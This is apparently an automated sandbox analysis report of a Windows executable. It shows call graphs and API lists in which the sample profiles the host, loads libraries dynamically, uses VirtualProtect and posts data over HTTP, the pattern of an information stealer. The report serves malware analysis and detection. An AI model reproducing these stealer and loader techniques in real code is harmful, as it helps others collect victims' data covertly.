lstrcpy 15145->15146 15147 ed1ec5 15146->15147 15148 eda9b0 4 API calls 15147->15148 15149 ed1ee5 15148->15149 15150 eda8a0 lstrcpy 15149->15150 15151 ed1eee 15150->15151 15787 ed7b00 GetUserDefaultLocaleName 15151->15787 15154 eda9b0 4 API calls 15155 ed1f0e 15154->15155 15156 eda8a0 lstrcpy 15155->15156 15157 ed1f17 15156->15157 15158 eda9b0 4 API calls 15157->15158 15159 ed1f36 15158->15159 15160 eda8a0 lstrcpy 15159->15160 15161 ed1f3f 15160->15161 15162 eda9b0 4 API calls 15161->15162 15163 ed1f60 15162->15163 15164 eda8a0 lstrcpy 15163->15164 15165 ed1f69 15164->15165 15791 ed7b90 15165->15791 15167 ed1f80 15168 eda920 3 API calls 15167->15168 15169 ed1f93 15168->15169 15170 eda8a0 lstrcpy 15169->15170 15171 ed1f9c 15170->15171 15172 eda9b0 4 API calls 15171->15172 15173 ed1fc6 15172->15173 15174 eda8a0 lstrcpy 15173->15174 15175 ed1fcf 15174->15175 15176 eda9b0 4 API calls 15175->15176 15177 ed1fef 15176->15177 15178 eda8a0 lstrcpy 15177->15178 15179 ed1ff8 15178->15179 15803 ed7d80 GetSystemPowerStatus 15179->15803 15182 eda9b0 4 API calls 15183 ed2018 15182->15183 15184 eda8a0 lstrcpy 15183->15184 15185 ed2021 15184->15185 15186 eda9b0 4 API calls 15185->15186 15187 ed2040 15186->15187 15188 eda8a0 lstrcpy 15187->15188 15189 ed2049 15188->15189 15190 eda9b0 4 API calls 15189->15190 15191 ed206a 15190->15191 15192 eda8a0 lstrcpy 15191->15192 15193 ed2073 15192->15193 15194 ed207e GetCurrentProcessId 15193->15194 15805 ed9470 OpenProcess 15194->15805 15197 eda920 3 API calls 15198 ed20a4 15197->15198 15199 eda8a0 lstrcpy 15198->15199 15200 ed20ad 15199->15200 15201 eda9b0 4 API calls 15200->15201 15202 ed20d7 15201->15202 15203 eda8a0 lstrcpy 15202->15203 15204 ed20e0 15203->15204 15205 eda9b0 4 API calls 15204->15205 15206 ed2100 15205->15206 15207 eda8a0 lstrcpy 15206->15207 15208 ed2109 15207->15208 15810 ed7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15208->15810 15211 eda9b0 4 API calls 15212 ed2129 15211->15212 15213 eda8a0 lstrcpy 15212->15213 15214 ed2132 15213->15214 15215 eda9b0 4 API calls 15214->15215 15216 ed2151 15215->15216 15217 eda8a0 lstrcpy 15216->15217 15218 ed215a 15217->15218 15219 eda9b0 4 API calls 15218->15219 15220 ed217b 15219->15220 15221 eda8a0 lstrcpy 15220->15221 15222 ed2184 15221->15222 15814 ed7f60 15222->15814 15225 eda9b0 4 API calls 15226 ed21a4 15225->15226 15227 eda8a0 lstrcpy 15226->15227 15228 ed21ad 15227->15228 15229 eda9b0 4 API calls 15228->15229 15230 ed21cc 15229->15230 15231 eda8a0 lstrcpy 15230->15231 15232 ed21d5 15231->15232 15233 eda9b0 4 API calls 15232->15233 15234 ed21f6 15233->15234 15235 eda8a0 lstrcpy 15234->15235 15236 ed21ff 15235->15236 15827 ed7ed0 GetSystemInfo wsprintfA 15236->15827 15239 eda9b0 4 API calls 15240 ed221f 15239->15240 15241 eda8a0 lstrcpy 15240->15241 15242 ed2228 15241->15242 15243 eda9b0 4 API calls 15242->15243 15244 ed2247 15243->15244 15245 eda8a0 lstrcpy 15244->15245 15246 ed2250 15245->15246 15247 eda9b0 4 API calls 15246->15247 15248 ed2270 15247->15248 15249 eda8a0 lstrcpy 15248->15249 15250 ed2279 15249->15250 15829 ed8100 GetProcessHeap RtlAllocateHeap 15250->15829 15253 eda9b0 4 API calls 15254 ed2299 15253->15254 15255 eda8a0 lstrcpy 15254->15255 15256 ed22a2 15255->15256 15257 eda9b0 4 API calls 15256->15257 15258 ed22c1 15257->15258 15259 eda8a0 lstrcpy 15258->15259 15260 ed22ca 15259->15260 15261 eda9b0 4 API calls 15260->15261 15262 ed22eb 15261->15262 15263 eda8a0 lstrcpy 15262->15263 15264 ed22f4 15263->15264 15835 ed87c0 15264->15835 15267 eda920 3 API calls 15268 ed231e 15267->15268 15269 eda8a0 lstrcpy 15268->15269 15270 ed2327 15269->15270 15271 eda9b0 4 API calls 15270->15271 15272 ed2351 15271->15272 15273 eda8a0 lstrcpy 15272->15273 15274 ed235a 15273->15274 15275 eda9b0 4 API calls 15274->15275 15276 ed237a 15275->15276 15277 eda8a0 lstrcpy 15276->15277 15278 ed2383 15277->15278 15279 eda9b0 4 API calls 15278->15279 15280 ed23a2 15279->15280 15281 eda8a0 lstrcpy 15280->15281 15282 ed23ab 15281->15282 15840 ed81f0 15282->15840 15284 ed23c2 15285 eda920 3 API calls 15284->15285 15286 ed23d5 15285->15286 15287 eda8a0 lstrcpy 15286->15287 15288 ed23de 15287->15288 15289 eda9b0 4 API calls 15288->15289 15290 ed240a 15289->15290 15291 eda8a0 lstrcpy 15290->15291 15292 ed2413 15291->15292 15293 eda9b0 4 API calls 15292->15293 15294 ed2432 15293->15294 15295 eda8a0 lstrcpy 15294->15295 15296 ed243b 15295->15296 15297 eda9b0 4 API calls 15296->15297 15298 ed245c 15297->15298 15299 eda8a0 lstrcpy 15298->15299 15300 ed2465 15299->15300 15301 eda9b0 4 API calls 15300->15301 15302 ed2484 15301->15302 15303 eda8a0 lstrcpy 15302->15303 15304 ed248d 15303->15304 15305 eda9b0 4 API calls 15304->15305 15306 ed24ae 15305->15306 15307 eda8a0 lstrcpy 15306->15307 15308 ed24b7 15307->15308 15848 ed8320 15308->15848 15310 ed24d3 15311 eda920 3 API calls 15310->15311 15312 ed24e6 15311->15312 15313 eda8a0 lstrcpy 15312->15313 15314 ed24ef 15313->15314 15315 eda9b0 4 API calls 15314->15315 15316 ed2519 15315->15316 15317 eda8a0 lstrcpy 15316->15317 15318 ed2522 15317->15318 15319 eda9b0 4 API calls 15318->15319 15320 ed2543 15319->15320 15321 eda8a0 lstrcpy 15320->15321 15322 ed254c 15321->15322 15323 ed8320 17 API calls 15322->15323 15324 ed2568 15323->15324 15325 eda920 3 API calls 15324->15325 15326 ed257b 15325->15326 15327 eda8a0 lstrcpy 15326->15327 15328 ed2584 15327->15328 15329 eda9b0 4 API calls 15328->15329 15330 ed25ae 15329->15330 15331 eda8a0 lstrcpy 15330->15331 15332 ed25b7 15331->15332 15333 eda9b0 4 API calls 15332->15333 15334 ed25d6 15333->15334 15335 eda8a0 lstrcpy 15334->15335 15336 ed25df 15335->15336 15337 eda9b0 4 API calls 15336->15337 15338 ed2600 15337->15338 15339 eda8a0 lstrcpy 15338->15339 15340 ed2609 15339->15340 15884 ed8680 15340->15884 15342 ed2620 15343 eda920 3 API calls 15342->15343 15344 ed2633 15343->15344 15345 eda8a0 lstrcpy 15344->15345 15346 ed263c 15345->15346 15347 ed265a lstrlen 15346->15347 15348 ed266a 15347->15348 15349 eda740 lstrcpy 15348->15349 15350 ed267c 15349->15350 15351 ec1590 lstrcpy 15350->15351 15352 ed268d 15351->15352 15894 ed5190 15352->15894 15354 ed2699 15354->13786 16082 edaad0 15355->16082 15357 ec5009 InternetOpenUrlA 15361 ec5021 15357->15361 15358 ec502a InternetReadFile 15358->15361 15359 ec50a0 InternetCloseHandle InternetCloseHandle 15360 ec50ec 15359->15360 15360->13790 15361->15358 15361->15359 16083 ec98d0 15362->16083 15364 ed0759 15365 ed077d 15364->15365 15366 ed0a38 15364->15366 15368 ed0799 StrCmpCA 15365->15368 15367 ec1590 lstrcpy 15366->15367 15369 ed0a49 15367->15369 15370 ed07a8 15368->15370 15398 ed0843 15368->15398 16259 ed0250 15369->16259 15372 eda7a0 lstrcpy 15370->15372 15375 ed07c3 15372->15375 15374 ed0865 StrCmpCA 15377 ed0874 15374->15377 15414 ed096b 15374->15414 15376 ec1590 lstrcpy 15375->15376 15378 ed080c 15376->15378 15379 eda740 lstrcpy 15377->15379 15380 eda7a0 lstrcpy 15378->15380 15382 ed0881 15379->15382 15383 ed0823 15380->15383 15381 ed099c StrCmpCA 15384 ed09ab 15381->15384 15385 ed0a2d 15381->15385 15386 eda9b0 4 API calls 15382->15386 15387 eda7a0 lstrcpy 15383->15387 15388 ec1590 lstrcpy 15384->15388 15385->13794 15389 ed08ac 15386->15389 15391 ed083e 15387->15391 15392 ed09f4 15388->15392 15390 eda920 3 API calls 15389->15390 15393 ed08b3 15390->15393 16086 ecfb00 15391->16086 15395 eda7a0 lstrcpy 15392->15395 15397 eda9b0 4 API calls 15393->15397 15396 ed0a0d 15395->15396 15399 eda7a0 lstrcpy 15396->15399 15400 ed08ba 15397->15400 15398->15374 15401 ed0a28 15399->15401 15402 eda8a0 lstrcpy 15400->15402 15414->15381 15734 eda7a0 lstrcpy 15733->15734 15735 ec1683 15734->15735 15736 eda7a0 lstrcpy 15735->15736 15737 ec1695 15736->15737 15738 eda7a0 lstrcpy 15737->15738 15739 ec16a7 15738->15739 15740 eda7a0 lstrcpy 15739->15740 15741 ec15a3 15740->15741 15741->14617 15743 ec47c6 15742->15743 15744 ec4838 lstrlen 15743->15744 15768 edaad0 15744->15768 15746 ec4848 InternetCrackUrlA 15747 ec4867 15746->15747 15747->14694 15749 eda740 lstrcpy 15748->15749 15750 ed8b74 15749->15750 15751 eda740 lstrcpy 15750->15751 15752 ed8b82 GetSystemTime 15751->15752 15754 ed8b99 15752->15754 15753 eda7a0 lstrcpy 15755 ed8bfc 15753->15755 15754->15753 15755->14709 15757 eda931 15756->15757 15758 eda988 15757->15758 15760 eda968 lstrcpy lstrcat 15757->15760 15759 eda7a0 lstrcpy 15758->15759 15761 eda994 15759->15761 15760->15758 15761->14712 15762->14827 15764 ec9af9 LocalAlloc 15763->15764 15765 ec4eee 15763->15765 15764->15765 15766 ec9b14 CryptStringToBinaryA 15764->15766 15765->14715 15765->14717 15766->15765 15767 ec9b39 LocalFree 15766->15767 15767->15765 15768->15746 15769->14837 15770->14978 15771->14980 15772->14988 15901 ed77a0 15773->15901 15776 ed1c1e 15776->15070 15777 ed76c6 RegOpenKeyExA 15778 ed7704 RegCloseKey 15777->15778 15779 ed76e7 RegQueryValueExA 15777->15779 15778->15776 15779->15778 15781 ed1c99 15780->15781 15781->15084 15783 ed1e09 15782->15783 15783->15126 15785 ed7a9a wsprintfA 15784->15785 15786 ed1e84 15784->15786 15785->15786 15786->15140 15788 ed7b4d 15787->15788 15789 ed1efe 15787->15789 15908 ed8d20 LocalAlloc CharToOemW 15788->15908 15789->15154 15792 eda740 lstrcpy 15791->15792 15793 ed7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15792->15793 15802 ed7c25 15793->15802 15794 ed7d18 15796 ed7d1e LocalFree 15794->15796 15797 ed7d28 15794->15797 15795 ed7c46 GetLocaleInfoA 15795->15802 15796->15797 15798 eda7a0 lstrcpy 15797->15798 15799 ed7d37 15798->15799 15799->15167 15800 eda8a0 lstrcpy 15800->15802 15801 eda9b0 lstrcpy lstrlen lstrcpy lstrcat 15801->15802 15802->15794 15802->15795 15802->15800 15802->15801 15804 ed2008 15803->15804 15804->15182 15806 ed94b5 15805->15806 15807 ed9493 GetModuleFileNameExA CloseHandle 15805->15807 15808 eda740 lstrcpy 15806->15808 15807->15806 15809 ed2091 15808->15809 15809->15197 15811 ed7e68 RegQueryValueExA 15810->15811 15812 ed2119 15810->15812 15813 ed7e8e RegCloseKey 15811->15813 15812->15211 15813->15812 15815 ed7fb9 GetLogicalProcessorInformationEx 15814->15815 15816 ed8029 15815->15816 15817 ed7fd8 GetLastError 15815->15817 15822 ed89f0 2 API calls 15816->15822 15820 ed8022 15817->15820 15826 ed7fe3 15817->15826 15821 ed2194 15820->15821 15823 ed89f0 2 API calls 15820->15823 15821->15225 15824 ed807b 15822->15824 15823->15821 15824->15820 15825 ed8084 wsprintfA 15824->15825 15825->15821 15826->15815 15826->15821 15909 ed89f0 15826->15909 15912 ed8a10 GetProcessHeap RtlAllocateHeap 15826->15912 15828 ed220f 15827->15828 15828->15239 15830 ed89b0 15829->15830 15831 ed814d GlobalMemoryStatusEx 15830->15831 15832 ed8163 __aulldiv 15831->15832 15833 ed819b wsprintfA 15832->15833 15834 ed2289 15833->15834 15834->15253 15836 ed87fb GetProcessHeap RtlAllocateHeap wsprintfA 15835->15836 15838 eda740 lstrcpy 15836->15838 15839 ed230b 15838->15839 15839->15267 15841 eda740 lstrcpy 15840->15841 15845 ed8229 15841->15845 15842 ed8263 15844 eda7a0 lstrcpy 15842->15844 15843 eda9b0 lstrcpy lstrlen lstrcpy lstrcat 15843->15845 15846 ed82dc 15844->15846 15845->15842 15845->15843 15847 eda8a0 lstrcpy 15845->15847 15846->15284 15847->15845 15849 eda740 lstrcpy 15848->15849 15850 ed835c RegOpenKeyExA 15849->15850 15851 ed83ae 15850->15851 15852 ed83d0 15850->15852 15853 eda7a0 lstrcpy 15851->15853 15854 ed83f8 RegEnumKeyExA 15852->15854 15855 ed8613 RegCloseKey 15852->15855 15864 ed83bd 15853->15864 15857 ed843f wsprintfA RegOpenKeyExA 15854->15857 15858 ed860e 15854->15858 15856 eda7a0 lstrcpy 15855->15856 15856->15864 15859 ed8485 RegCloseKey RegCloseKey 15857->15859 15860 ed84c1 RegQueryValueExA 15857->15860 15858->15855 15861 eda7a0 lstrcpy 15859->15861 15862 ed84fa lstrlen 15860->15862 15863 ed8601 RegCloseKey 15860->15863 15861->15864 15862->15863 15865 ed8510 15862->15865 15863->15858 15864->15310 15866 eda9b0 4 API calls 15865->15866 15867 ed8527 15866->15867 15868 eda8a0 lstrcpy 15867->15868 15869 ed8533 15868->15869 15870 eda9b0 4 API calls 15869->15870 15871 ed8557 15870->15871 15872 eda8a0 lstrcpy 15871->15872 15873 ed8563 15872->15873 15874 ed856e RegQueryValueExA 15873->15874 15874->15863 15875 ed85a3 15874->15875 15876 eda9b0 4 API calls 15875->15876 15877 ed85ba 15876->15877 15878 eda8a0 lstrcpy 15877->15878 15879 ed85c6 15878->15879 15880 eda9b0 4 API calls 15879->15880 15881 ed85ea 15880->15881 15882 eda8a0 lstrcpy 15881->15882 15883 ed85f6 15882->15883 15883->15863 15885 eda740 lstrcpy 15884->15885 15886 ed86bc CreateToolhelp32Snapshot Process32First 15885->15886 15887 ed875d CloseHandle 15886->15887 15888 ed86e8 Process32Next 15886->15888 15889 eda7a0 lstrcpy 15887->15889 15888->15887 15891 ed86fd 15888->15891 15890 ed8776 15889->15890 15890->15342 15891->15888 15892 eda9b0 lstrcpy lstrlen lstrcpy lstrcat 15891->15892 15893 eda8a0 lstrcpy 15891->15893 15892->15891 15893->15891 15895 eda7a0 lstrcpy 15894->15895 15896 ed51b5 15895->15896 15897 ec1590 lstrcpy 15896->15897 15898 ed51c6 15897->15898 15913 ec5100 15898->15913 15900 ed51cf 15900->15354 15904 ed7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15901->15904 15903 ed76b9 15903->15776 15903->15777 15905 ed7765 RegQueryValueExA 15904->15905 15906 ed7780 RegCloseKey 15904->15906 15905->15906 15907 ed7793 15906->15907 15907->15903 15908->15789 15910 ed8a0c 15909->15910 15911 ed89f9 GetProcessHeap HeapFree 15909->15911 15910->15826 15911->15910 15912->15826 15914 eda7a0 lstrcpy 15913->15914 15915 ec5119 15914->15915 15916 ec47b0 2 API calls 15915->15916 15917 ec5125 15916->15917 16073 ed8ea0 15917->16073 15919 ec5184 15920 ec5192 lstrlen 15919->15920 15921 ec51a5 15920->15921 15922 ed8ea0 4 API calls 15921->15922 15923 ec51b6 15922->15923 15924 eda740 lstrcpy 15923->15924 15925 ec51c9 15924->15925 15926 eda740 lstrcpy 15925->15926 15927 ec51d6 15926->15927 15928 eda740 lstrcpy 15927->15928 15929 ec51e3 15928->15929 15930 eda740 lstrcpy 15929->15930 15931 ec51f0 15930->15931 15932 eda740 lstrcpy 15931->15932 15933 ec51fd InternetOpenA StrCmpCA 15932->15933 15934 ec522f 15933->15934 15935 ec58c4 InternetCloseHandle 15934->15935 15936 ed8b60 3 API calls 15934->15936 15942 ec58d9 ctype 15935->15942 15937 ec524e 15936->15937 15938 eda920 3 API calls 15937->15938 15939 ec5261 15938->15939 15940 eda8a0 lstrcpy 15939->15940 15941 ec526a 15940->15941 15943 eda9b0 4 API calls 15941->15943 15946 eda7a0 lstrcpy 15942->15946 15944 ec52ab 15943->15944 15945 eda920 3 API calls 15944->15945 15947 ec52b2 15945->15947 15951 ec5913 15946->15951 15948 eda9b0 4 API calls 15947->15948 15949 ec52b9 15948->15949 15950 eda8a0 lstrcpy 15949->15950 15952 ec52c2 15950->15952 15951->15900 15953 eda9b0 4 API calls 15952->15953 15954 ec5303 15953->15954 15955 eda920 3 API calls 15954->15955 15956 ec530a 15955->15956 15957 eda8a0 lstrcpy 15956->15957 15958 ec5313 15957->15958 15959 ec5329 InternetConnectA 15958->15959 15959->15935 15960 ec5359 HttpOpenRequestA 15959->15960 15962 ec58b7 InternetCloseHandle 15960->15962 15963 ec53b7 15960->15963 15962->15935 15964 eda9b0 4 API calls 15963->15964 15965 ec53cb 15964->15965 15966 eda8a0 lstrcpy 15965->15966 15967 ec53d4 15966->15967 15968 eda920 3 API calls 15967->15968 15969 ec53f2 15968->15969 15970 eda8a0 lstrcpy 15969->15970 15971 ec53fb 15970->15971 15972 eda9b0 4 API calls 15971->15972 15973 ec541a 15972->15973 15974 eda8a0 lstrcpy 15973->15974 15975 ec5423 15974->15975 15976 eda9b0 4 API calls 15975->15976 15977 ec5444 15976->15977 15978 eda8a0 lstrcpy 15977->15978 15979 ec544d 15978->15979 15980 eda9b0 4 API calls 15979->15980 15981 ec546e 15980->15981 16074 ed8ead CryptBinaryToStringA 16073->16074 16075 ed8ea9 16073->16075 16074->16075 16076 ed8ece GetProcessHeap RtlAllocateHeap 16074->16076 16075->15919 16076->16075 16077 ed8ef4 ctype 16076->16077 16078 ed8f05 CryptBinaryToStringA 16077->16078 16078->16075 16082->15357 16325 ec9880 16083->16325 16085 ec98e1 16085->15364 16087 eda740 lstrcpy 16086->16087 16088 ecfb16 16087->16088 16260 eda740 lstrcpy 16259->16260 16261 ed0266 16260->16261 16262 ed8de0 2 API calls 16261->16262 16263 ed027b 16262->16263 16264 eda920 3 API calls 16263->16264 16265 ed028b 16264->16265 16266 eda8a0 lstrcpy 16265->16266 16267 ed0294 16266->16267 16268 eda9b0 4 API calls 16267->16268 16326 ec988d 16325->16326 16329 ec6fb0 16326->16329 16328 ec98ad ctype 16328->16085 16332 ec6d40 16329->16332 16333 ec6d63 16332->16333 16346 ec6d59 16332->16346 16348 ec6530 16333->16348 16337 ec6dbe 16337->16346 16358 ec69b0 16337->16358 16339 ec6e2a 16340 ec6ee6 VirtualFree 16339->16340 16342 ec6ef7 16339->16342 16339->16346 16340->16342 16341 ec6f41 16345 ed89f0 2 API calls 16341->16345 16341->16346 16342->16341 16343 ec6f38 16342->16343 16344 ec6f26 FreeLibrary 16342->16344 16347 ed89f0 2 API calls 16343->16347 16344->16342 16345->16346 16346->16328 16347->16341 16349 ec6542 16348->16349 16351 ec6549 16349->16351 16368 ed8a10 GetProcessHeap RtlAllocateHeap 16349->16368 16351->16346 16352 ec6660 16351->16352 16357 ec668f VirtualAlloc 16352->16357 16354 ec6730 16355 ec6743 VirtualAlloc 16354->16355 16356 ec673c 16354->16356 16355->16356 16356->16337 16357->16354 16357->16356 16359 ec69c9 16358->16359 16363 ec69d5 16358->16363 16360 ec6a09 LoadLibraryA 16359->16360 16359->16363 16361 ec6a32 16360->16361 16360->16363 16365 ec6ae0 16361->16365 16369 ed8a10 GetProcessHeap RtlAllocateHeap 16361->16369 16363->16339 16364 ec6ba8 GetProcAddress 16364->16363 16364->16365 16365->16363 16365->16364 16366 ed89f0 2 API calls 16366->16365 16367 ec6a8b 16367->16363 16367->16366 16368->16351 16369->16367

                                Executed Functions

                                Function 00ED9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 ed9860-ed9874 call ed9750 663 ed987a-ed9a8e call ed9780 GetProcAddress * 21 660->663 664 ed9a93-ed9af2 LoadLibraryA * 5 660->664 663->664 666 ed9b0d-ed9b14 664->666 667 ed9af4-ed9b08 GetProcAddress 664->667 669 ed9b46-ed9b4d 666->669 670 ed9b16-ed9b41 GetProcAddress * 2 666->670 667->666 671 ed9b4f-ed9b63 GetProcAddress 669->671 672 ed9b68-ed9b6f 669->672 670->669 671->672 673 ed9b89-ed9b90 672->673 674 ed9b71-ed9b84 GetProcAddress 672->674 675 ed9bc1-ed9bc2 673->675 676 ed9b92-ed9bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(75900000,01B80750), ref: 00ED98A1
                                • GetProcAddress.KERNEL32(75900000,01B807B0), ref: 00ED98BA
                                • GetProcAddress.KERNEL32(75900000,01B806F0), ref: 00ED98D2
                                • GetProcAddress.KERNEL32(75900000,01B80780), ref: 00ED98EA
                                • GetProcAddress.KERNEL32(75900000,01B80570), ref: 00ED9903
                                • GetProcAddress.KERNEL32(75900000,01B88B00), ref: 00ED991B
                                • GetProcAddress.KERNEL32(75900000,01B76440), ref: 00ED9933
                                • GetProcAddress.KERNEL32(75900000,01B76300), ref: 00ED994C
                                • GetProcAddress.KERNEL32(75900000,01B80768), ref: 00ED9964
                                • GetProcAddress.KERNEL32(75900000,01B80708), ref: 00ED997C
                                • GetProcAddress.KERNEL32(75900000,01B80798), ref: 00ED9995
                                • GetProcAddress.KERNEL32(75900000,01B805B8), ref: 00ED99AD
                                • GetProcAddress.KERNEL32(75900000,01B76320), ref: 00ED99C5
                                • GetProcAddress.KERNEL32(75900000,01B807C8), ref: 00ED99DE
                                • GetProcAddress.KERNEL32(75900000,01B807E0), ref: 00ED99F6
                                • GetProcAddress.KERNEL32(75900000,01B764A0), ref: 00ED9A0E
                                • GetProcAddress.KERNEL32(75900000,01B80810), ref: 00ED9A27
                                • GetProcAddress.KERNEL32(75900000,01B80858), ref: 00ED9A3F
                                • GetProcAddress.KERNEL32(75900000,01B764C0), ref: 00ED9A57
                                • GetProcAddress.KERNEL32(75900000,01B808B8), ref: 00ED9A70
                                • GetProcAddress.KERNEL32(75900000,01B765A0), ref: 00ED9A88
                                • LoadLibraryA.KERNEL32(01B80888,?,00ED6A00), ref: 00ED9A9A
                                • LoadLibraryA.KERNEL32(01B80870,?,00ED6A00), ref: 00ED9AAB
                                • LoadLibraryA.KERNEL32(01B80918,?,00ED6A00), ref: 00ED9ABD
                                • LoadLibraryA.KERNEL32(01B80900,?,00ED6A00), ref: 00ED9ACF
                                • LoadLibraryA.KERNEL32(01B808A0,?,00ED6A00), ref: 00ED9AE0
                                • GetProcAddress.KERNEL32(75070000,01B808D0), ref: 00ED9B02
                                • GetProcAddress.KERNEL32(75FD0000,01B808E8), ref: 00ED9B23
                                • GetProcAddress.KERNEL32(75FD0000,01B88EF8), ref: 00ED9B3B
                                • GetProcAddress.KERNEL32(75A50000,01B88F28), ref: 00ED9B5D
                                • GetProcAddress.KERNEL32(74E50000,01B76520), ref: 00ED9B7E
                                • GetProcAddress.KERNEL32(76E80000,01B88A90), ref: 00ED9B9F
                                • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00ED9BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00ED9BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction ID: 368aaca265a629e11adce1e31b7d42841a0857fdb81c88242388e58c555208db
                                • Opcode Fuzzy Hash: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction Fuzzy Hash: CAA11BB5D107409FD36EEFA8F99895637F9FF8C302704853AA6268324CD6BA95C1CB50
                                Function 00EC45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 ec45c0-ec4695 RtlAllocateHeap 781 ec46a0-ec46a6 764->781 782 ec46ac-ec474a 781->782 783 ec474f-ec47a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EC479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46CD
